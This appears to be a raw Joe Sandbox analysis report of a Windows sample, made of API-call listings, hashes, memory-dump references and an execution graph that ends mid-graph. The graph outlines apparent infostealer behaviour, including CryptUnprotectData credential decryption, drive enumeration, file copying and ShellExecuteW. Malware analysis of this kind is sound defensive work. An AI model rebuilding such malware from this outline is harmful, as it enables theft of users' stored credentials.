                                                                        • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                                                                        • String ID:
                                                                        • API String ID: 158306478-0
                                                                        • Opcode ID: 043127d6c5ba8839a926be11c38013bc0a01ad6a9029a24a8dc822200e6b2622
                                                                        • Instruction ID: 4432fb3b1f1cfebbc3064aecccf7671daf182606b94b194b717de09181cae7a0
                                                                        • Opcode Fuzzy Hash: 043127d6c5ba8839a926be11c38013bc0a01ad6a9029a24a8dc822200e6b2622
                                                                        • Instruction Fuzzy Hash: CA1196B15016567E6B1527729CCEDBFAFEDDE9939431000EBF805D6201FE64DD024571
                                                                        APIs
                                                                        • WriteConsoleW.KERNEL32(00000000,?,?,00000000,00000000,?,00BDD76F,00000000,00000001,?,?,?,00BD770F,?,00000000,00000000), ref: 00BDF1CF
                                                                        • GetLastError.KERNEL32(?,00BDD76F,00000000,00000001,?,?,?,00BD770F,?,00000000,00000000,?,?,?,00BD7055,?), ref: 00BDF1DB
                                                                          • Part of subcall function 00BDF22C: CloseHandle.KERNEL32(FFFFFFFE,00BDF1EB,?,00BDD76F,00000000,00000001,?,?,?,00BD770F,?,00000000,00000000,?,?), ref: 00BDF23C
                                                                        • ___initconout.LIBCMT ref: 00BDF1EB
                                                                          • Part of subcall function 00BDF20D: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00BDF1A9,00BDD75C,?,?,00BD770F,?,00000000,00000000,?), ref: 00BDF220
                                                                        • WriteConsoleW.KERNEL32(00000000,?,?,00000000,?,00BDD76F,00000000,00000001,?,?,?,00BD770F,?,00000000,00000000,?), ref: 00BDF200
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2279043918.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                        • Associated: 00000000.00000002.2279023228.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279071566.0000000000BE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279089498.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279145817.0000000000BEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279162447.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279218738.0000000000BF7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                        • String ID:
                                                                        • API String ID: 2744216297-0
                                                                        • Opcode ID: 26832a6e26e93338eca165074e827a3646d0b1ffd4d3a438e2a9504a6ed2390a
                                                                        • Instruction ID: af03d3e2b2d5d633681ee0a54a756dff12c721803ee5dfc3d97ba1530bdc9cd0
                                                                        • Opcode Fuzzy Hash: 26832a6e26e93338eca165074e827a3646d0b1ffd4d3a438e2a9504a6ed2390a
                                                                        • Instruction Fuzzy Hash: D6F0A23B544155BBCF125F95DC459AA7F65FB493A1B044171FA199A230DA3188209B90
                                                                        APIs
                                                                        • SleepConditionVariableCS.KERNELBASE(?,00BBE7A5,00000064), ref: 00BBE83F
                                                                        • LeaveCriticalSection.KERNEL32(00BF0160,?,?,00BBE7A5,00000064), ref: 00BBE849
                                                                        • WaitForSingleObjectEx.KERNEL32(?,00000000,?,00BBE7A5,00000064), ref: 00BBE85A
                                                                        • EnterCriticalSection.KERNEL32(00BF0160,?,00BBE7A5,00000064), ref: 00BBE861
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2279043918.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                        • Associated: 00000000.00000002.2279023228.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279071566.0000000000BE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279089498.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279145817.0000000000BEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279162447.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279218738.0000000000BF7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: CriticalSection$ConditionEnterLeaveObjectSingleSleepVariableWait
                                                                        • String ID:
                                                                        • API String ID: 3269011525-0
                                                                        • Opcode ID: b7bfe24d782b6ef8a74ea585ef27b5a0b536f1d73cd8b7f35f84ef7daa3095dd
                                                                        • Instruction ID: bd768f86ce7bfc85cdc3873baef1405e9f2142b10ebea336c7d8023079dfb27d
                                                                        • Opcode Fuzzy Hash: b7bfe24d782b6ef8a74ea585ef27b5a0b536f1d73cd8b7f35f84ef7daa3095dd
                                                                        • Instruction Fuzzy Hash: B5E09232650568BBCA023B54EC08AFA3FA4EB05B51B040060FA097B1318F615A00DBD4
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2279043918.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                        • Associated: 00000000.00000002.2279023228.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279071566.0000000000BE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279089498.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279145817.0000000000BEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279162447.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279218738.0000000000BF7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: _strlen
                                                                        • String ID: +`^z$+`^z
                                                                        • API String ID: 4218353326-1884853765
                                                                        • Opcode ID: a3327e4b85bc9cee8ccc1a79b0a96baf3b8f1dc97ffbfa910a2b6d4aa7e5cd41
                                                                        • Instruction ID: 3fe9e7a446afe64ad61bc82b2ba76e04b73be59d0684fa0a855ea531a54294fc
                                                                        • Opcode Fuzzy Hash: a3327e4b85bc9cee8ccc1a79b0a96baf3b8f1dc97ffbfa910a2b6d4aa7e5cd41
                                                                        • Instruction Fuzzy Hash: B59127B460C3409FC764DF18C4D462EBBE0EB9A314F58489EE99AD7326D631DD948B83
                                                                        APIs
                                                                        • __startOneArgErrorHandling.LIBCMT ref: 00BC44BD
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2279043918.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                        • Associated: 00000000.00000002.2279023228.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279071566.0000000000BE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279089498.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279145817.0000000000BEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279162447.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279218738.0000000000BF7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorHandling__start
                                                                        • String ID: pow
                                                                        • API String ID: 3213639722-2276729525
                                                                        • Opcode ID: 240a5e940830fce111a7effd5996ca43c68867e99b06c9e1638ea551c5b15f0b
                                                                        • Instruction ID: cf6dabf6c6b4b77965a2639b4a97f401da9a6b88c5c44c485e5656307112df7e
                                                                        • Opcode Fuzzy Hash: 240a5e940830fce111a7effd5996ca43c68867e99b06c9e1638ea551c5b15f0b
                                                                        • Instruction Fuzzy Hash: F2516761A0810397CB197B18C9A1FBE2BE5DB50750F3089FCE4D6863A9EF348D849A46
                                                                        APIs
                                                                          • Part of subcall function 00BCF9CB: GetLastError.KERNEL32(00000000,?,00BD1D01), ref: 00BCF9CF
                                                                          • Part of subcall function 00BCF9CB: SetLastError.KERNEL32(00000000,?,?,00000028,00BCA98F), ref: 00BCFA71
                                                                        • GetACP.KERNEL32(-00000002,00000000,?,00000000,00000000,?,00BC80ED,?,?,?,00000055,?,-00000050,?,?,?), ref: 00BD40E9
                                                                        • IsValidCodePage.KERNEL32(00000000,-00000002,00000000,?,00000000,00000000,?,00BC80ED,?,?,?,00000055,?,-00000050,?,?), ref: 00BD4120
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2279043918.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                        • Associated: 00000000.00000002.2279023228.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279071566.0000000000BE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279089498.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279145817.0000000000BEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279162447.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279218738.0000000000BF7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorLast$CodePageValid
                                                                        • String ID: utf8
                                                                        • API String ID: 943130320-905460609
                                                                        • Opcode ID: 59c7718126b6462cb1f46d481670309dde28719fa1db4010b68dea15dcec709c
                                                                        • Instruction ID: 35c0ce40e1ceebf1513a65c6f9ccb37bf36845bc6bb1a6399d81ec4774107494
                                                                        • Opcode Fuzzy Hash: 59c7718126b6462cb1f46d481670309dde28719fa1db4010b68dea15dcec709c
                                                                        • Instruction Fuzzy Hash: 3351C231650305ABDB25AB718C82FA7F7E8EF45700F1445EBFA459B382F770E9408661
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2279043918.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                        • Associated: 00000000.00000002.2279023228.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279071566.0000000000BE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279089498.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279145817.0000000000BEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279162447.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279218738.0000000000BF7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: bad locale name
                                                                        • API String ID: 0-1405518554
                                                                        • Opcode ID: 0a5831bfdbf9d5934fa27ff0a3746e60a9a52d18dde8976578ea4bd32226749d
                                                                        • Instruction ID: 20a6943c106370063a8c75f95da4e41e13478c643ae2e753539e4773ad3f4159
                                                                        • Opcode Fuzzy Hash: 0a5831bfdbf9d5934fa27ff0a3746e60a9a52d18dde8976578ea4bd32226749d
                                                                        • Instruction Fuzzy Hash: FC41B1A06083489BCB249F6984957BEBBD5AB95344F1008ACF85BCB381D7F9CD588793
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2279043918.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                        • Associated: 00000000.00000002.2279023228.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279071566.0000000000BE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279089498.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279145817.0000000000BEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279162447.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279218738.0000000000BF7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: bad locale name
                                                                        • API String ID: 0-1405518554
                                                                        • Opcode ID: f9f07c5380eaca6d5c90071ffa05c5489b5503620c311fdfdc3ddd997774561d
                                                                        • Instruction ID: fe1af374f75c63bfe68579461dd2dce4e03e137e2860d4ecf1cf73329f616197
                                                                        • Opcode Fuzzy Hash: f9f07c5380eaca6d5c90071ffa05c5489b5503620c311fdfdc3ddd997774561d
                                                                        • Instruction Fuzzy Hash: 8531E57060C3498BDB109BA994D57BFB6D0AB8A344F5048BDF85B8B381D7B5CC888797
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2279043918.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                        • Associated: 00000000.00000002.2279023228.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279071566.0000000000BE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279089498.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279145817.0000000000BEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279162447.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279218738.0000000000BF7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: _strlen
                                                                        • String ID: +`^z$+`^z
                                                                        • API String ID: 4218353326-1884853765
                                                                        • Opcode ID: 29deaa94cb9ec606c9c1a5ef88d27c14580741e111385e533bb71b4f2e4a48aa
                                                                        • Instruction ID: 7729fd5de0806850333f0d03969139c128357bab2c0f6efd9035e9812fb0d894
                                                                        • Opcode Fuzzy Hash: 29deaa94cb9ec606c9c1a5ef88d27c14580741e111385e533bb71b4f2e4a48aa
                                                                        • Instruction Fuzzy Hash: 4C413B7460C244DFC7249F28D595A2EBBE1EF86304F14889EF89A8B326D731CD448B93
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2279043918.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                        • Associated: 00000000.00000002.2279023228.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279071566.0000000000BE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279089498.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279145817.0000000000BEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279162447.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279218738.0000000000BF7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: _strlen
                                                                        • String ID: +`^z$+`^z
                                                                        • API String ID: 4218353326-1884853765
                                                                        • Opcode ID: 274c5ba61d0be3dc0cc1df80e95a490ac77f15d29ad9bd3c0290fde2e85a31fa
                                                                        • Instruction ID: 4d8601ba0eeb48d67fe303f624ac57c04924c447c59e408ae1ea3c21cf41b8a9
                                                                        • Opcode Fuzzy Hash: 274c5ba61d0be3dc0cc1df80e95a490ac77f15d29ad9bd3c0290fde2e85a31fa
                                                                        • Instruction Fuzzy Hash: F141C074608240DFCB249F28C4916BABBE4EF85304F54889EE49ADB316C778DD40CB93
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2279043918.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                        • Associated: 00000000.00000002.2279023228.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279071566.0000000000BE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279089498.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279145817.0000000000BEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279162447.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279218738.0000000000BF7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: _strlen
                                                                        • String ID: +`^z$+`^z
                                                                        • API String ID: 4218353326-1884853765
                                                                        • Opcode ID: c5d740eb9fb0bac1b5bef6a90293ce3d7ab5d096fe5d6a23f2f15027d43e0527
                                                                        • Instruction ID: 44d7f64c148e4f8d44a622bb1e1f0fdd66828bd0ca778fde32997e46eb0fdfa8
                                                                        • Opcode Fuzzy Hash: c5d740eb9fb0bac1b5bef6a90293ce3d7ab5d096fe5d6a23f2f15027d43e0527
                                                                        • Instruction Fuzzy Hash: B441B1746096409FCB249F28C49167ABBE4EB85304F54489DE49ACB316C774DD40C793
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2279043918.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                        • Associated: 00000000.00000002.2279023228.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279071566.0000000000BE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279089498.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279145817.0000000000BEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279162447.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279218738.0000000000BF7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: _strlen
                                                                        • String ID: +`^z$+`^z
                                                                        • API String ID: 4218353326-1884853765
                                                                        • Opcode ID: d97a654bb67dcfdca7e58b090a0ebfece4b286616fc69ec0534b1ac9c41be33f
                                                                        • Instruction ID: d1b20420ab5f4ac7e66d4b0a1181a0b60b0666fb3626a9e4067e73537baeacd5
                                                                        • Opcode Fuzzy Hash: d97a654bb67dcfdca7e58b090a0ebfece4b286616fc69ec0534b1ac9c41be33f
                                                                        • Instruction Fuzzy Hash: B141E274608240DFC7249F28D5A167BBBE4EF85300F1448AEE45A8B356C778DD408793
                                                                        APIs
                                                                        • ___except_validate_context_record.LIBVCRUNTIME ref: 00BCD74C
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2279043918.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                        • Associated: 00000000.00000002.2279023228.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279071566.0000000000BE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279089498.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279145817.0000000000BEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279162447.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279218738.0000000000BF7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: ___except_validate_context_record
                                                                        • String ID: csm$csm
                                                                        • API String ID: 3493665558-3733052814
                                                                        • Opcode ID: dd30419b66df1afad5e11204ecebab539c0947b3df7bf24c8fd20b0bf479d8db
                                                                        • Instruction ID: 426f96b16febafd5c57901358382d59107c02e02948794a1cf54e1d1e4d59596
                                                                        • Opcode Fuzzy Hash: dd30419b66df1afad5e11204ecebab539c0947b3df7bf24c8fd20b0bf479d8db
                                                                        • Instruction Fuzzy Hash: 10315E7A500259ABCF269F50C844FAA7BE6FF08715B1845AEFC584A121D332DCA1DB91
                                                                        APIs
                                                                        • ___std_exception_destroy.LIBVCRUNTIME ref: 00BA8B1C
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2279043918.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                        • Associated: 00000000.00000002.2279023228.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279071566.0000000000BE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279089498.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279145817.0000000000BEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279162447.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279218738.0000000000BF7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: ___std_exception_destroy
                                                                        • String ID: },4)$},4)
                                                                        • API String ID: 4194217158-1349039888
                                                                        • Opcode ID: d00d24428b834695abaf75a5193fb2d4bfe000e891c5477e5c01c8dd9a98ebb7
                                                                        • Instruction ID: 7f3dc96878855eece6d025cabd3fa234dd0ccee7ec564468afeb351e51ae13e7
                                                                        • Opcode Fuzzy Hash: d00d24428b834695abaf75a5193fb2d4bfe000e891c5477e5c01c8dd9a98ebb7
                                                                        • Instruction Fuzzy Hash: D501F9F095D2004BCE545B1898D252E76D49F76308F850CA9F44AEB620DF32DC44C7E7

                                                                        Execution Graph

                                                                        Execution Coverage:3.8%
                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                        Signature Coverage:33%
                                                                        Total number of Nodes:185
                                                                        Total number of Limit Nodes:12
                                                                        execution_graph 42659 43dce0 42660 43dd10 42659->42660 42663 43dd9e 42660->42663 42667 440d90 LdrInitializeThunk 42660->42667 42661 43df63 42663->42661 42664 43dece 42663->42664 42668 440d90 LdrInitializeThunk 42663->42668 42665 43dc40 RtlFreeHeap 42664->42665 42665->42661 42667->42663 42668->42664 42604 4100c5 42605 40fcc0 42604->42605 42607 40fcfd 42604->42607 42607->42605 42608 440cc0 42607->42608 42609 440d52 RtlReAllocateHeap 42608->42609 42610 440cdc 42608->42610 42611 440d6c 42608->42611 42612 440d61 42608->42612 42614 440cea 42608->42614 42609->42612 42610->42609 42610->42611 42610->42614 42615 43dc40 42611->42615 42612->42607 42614->42609 42616 43dcd3 42615->42616 42617 43dc58 RtlFreeHeap 42615->42617 42616->42612 42617->42616 42669 440f68 42670 440f71 GetForegroundWindow 42669->42670 42671 440f84 42670->42671 42672 41d5af 42673 41d5b4 42672->42673 42682 444110 42673->42682 42675 41d5ca 42677 41d603 42675->42677 42680 41d6ce 42675->42680 42681 41d88d 42675->42681 42686 4441f0 42675->42686 42677->42680 42677->42681 42692 440d90 LdrInitializeThunk 42677->42692 42679 41d863 CryptUnprotectData 42679->42681 42680->42679 42680->42681 42684 444140 42682->42684 42683 44419e 42683->42675 42684->42683 42693 440d90 LdrInitializeThunk 42684->42693 42687 444210 42686->42687 42687->42687 42690 44426e 42687->42690 42694 440d90 LdrInitializeThunk 42687->42694 42688 44432e 42688->42677 42690->42688 42695 440d90 LdrInitializeThunk 42690->42695 42692->42680 42693->42683 42694->42690 42695->42688 42701 40d0b0 42703 40d0c0 42701->42703 42702 40d277 ExitProcess 42703->42702 42704 40d0f1 GetCurrentThreadId 42703->42704 42705 40d272 42703->42705 42708 40d180 42704->42708 42720 440ca0 FreeLibrary 42705->42720 42707 40d24f GetForegroundWindow 42709 40d259 GetCurrentProcessId 42707->42709 42710 40d25f 42707->42710 42708->42707 42708->42708 42712 40d236 ShellExecuteW 42708->42712 42709->42710 42715 40e1c0 42710->42715 42712->42707 42713 40d264 42713->42705 42719 40f960 FreeLibrary 42713->42719 42716 40e200 42715->42716 42716->42716 42717 40e27e LoadLibraryExW 42716->42717 42718 40e293 42717->42718 42718->42713 42719->42705 42720->42702 42620 4413d5 42621 4413e6 42620->42621 42623 44143e 42621->42623 42627 440d90 LdrInitializeThunk 42621->42627 42626 440d90 LdrInitializeThunk 42623->42626 42625 44156f 42626->42625 42627->42623 42628 424750 42629 42475e 42628->42629 42632 4247a0 42628->42632 42634 424860 42629->42634 42631 42481c 42631->42632 42633 422e50 LdrInitializeThunk 42631->42633 42633->42632 42635 424870 42634->42635 42635->42635 42638 443f40 42635->42638 42637 42495f 42639 443f60 42638->42639 42640 4440be 42639->42640 42642 440d90 LdrInitializeThunk 42639->42642 42640->42637 42642->42640 42726 4359b7 42727 4359bc 42726->42727 42728 4359f2 GetSystemMetrics GetSystemMetrics 42727->42728 42729 435a31 42728->42729 42730 4410f1 42732 441140 42730->42732 42731 44126e 42732->42731 42734 440d90 LdrInitializeThunk 42732->42734 42734->42731 42735 4107f7 CoInitialize 42736 410800 CoInitialize 42735->42736 42737 41090c 42736->42737 42738 41091c CoInitializeSecurity 42737->42738 42739 410c5f CoUninitialize 42737->42739 42740 410c6f GetSystemDirectoryW 42737->42740 42741 41093e 42737->42741 42781 410c65 42737->42781 42738->42739 42738->42740 42738->42741 42739->42781 42740->42741 42741->42739 42741->42740 42742 43dc40 RtlFreeHeap 42741->42742 42743 410dac 42741->42743 42742->42741 42782 427230 42743->42782 42745 410f31 42746 40db20 21 API calls 42745->42746 42747 410f3b 42746->42747 42748 4279a0 LdrInitializeThunk 42747->42748 42749 410f4d 42748->42749 42750 40db20 21 API calls 42749->42750 42751 410f57 42750->42751 42752 427b90 LdrInitializeThunk 42751->42752 42753 410f69 42752->42753 42754 40db20 21 API calls 42753->42754 42755 410f73 42754->42755 42756 429d00 RtlFreeHeap RtlReAllocateHeap LdrInitializeThunk 42755->42756 42757 410f85 42756->42757 42758 42a6d0 RtlFreeHeap LdrInitializeThunk 42757->42758 42759 410f8e 42758->42759 42760 42aa40 CopyFileW RtlFreeHeap LdrInitializeThunk 42759->42760 42761 410f97 42760->42761 42762 42d360 LdrInitializeThunk 42761->42762 42763 410fa0 42762->42763 42764 40db20 21 API calls 42763->42764 42765 410faa 42764->42765 42766 40db20 21 API calls 42765->42766 42767 410fc6 42766->42767 42768 42eb60 6 API calls 42767->42768 42769 410fd8 42768->42769 42770 435210 6 API calls 42769->42770 42773 410fe1 42770->42773 42771 40db20 21 API calls 42772 410ffb CoUninitialize 42771->42772 42772->42773 42773->42771 42774 43dc40 RtlFreeHeap 42773->42774 42775 411459 42773->42775 42774->42773 42776 40db20 21 API calls 42775->42776 42777 4114f9 42776->42777 42778 440d90 LdrInitializeThunk 42777->42778 42779 4117e1 42777->42779 42777->42781 42778->42779 42780 440d90 LdrInitializeThunk 42779->42780 42779->42781 42780->42781 42783 427250 42782->42783 42783->42783 42784 443f40 LdrInitializeThunk 42783->42784 42786 427480 42784->42786 42785 4275f1 GetLogicalDrives 42787 443f40 LdrInitializeThunk 42785->42787 42786->42785 42786->42786 42788 427605 42787->42788 42789 415b37 42790 415b82 42789->42790 42795 41c6e0 42790->42795 42796 41c6f3 42795->42796 42799 443da0 42796->42799 42798 41c86d 42801 443db0 42799->42801 42800 443eee 42800->42798 42801->42800 42803 440d90 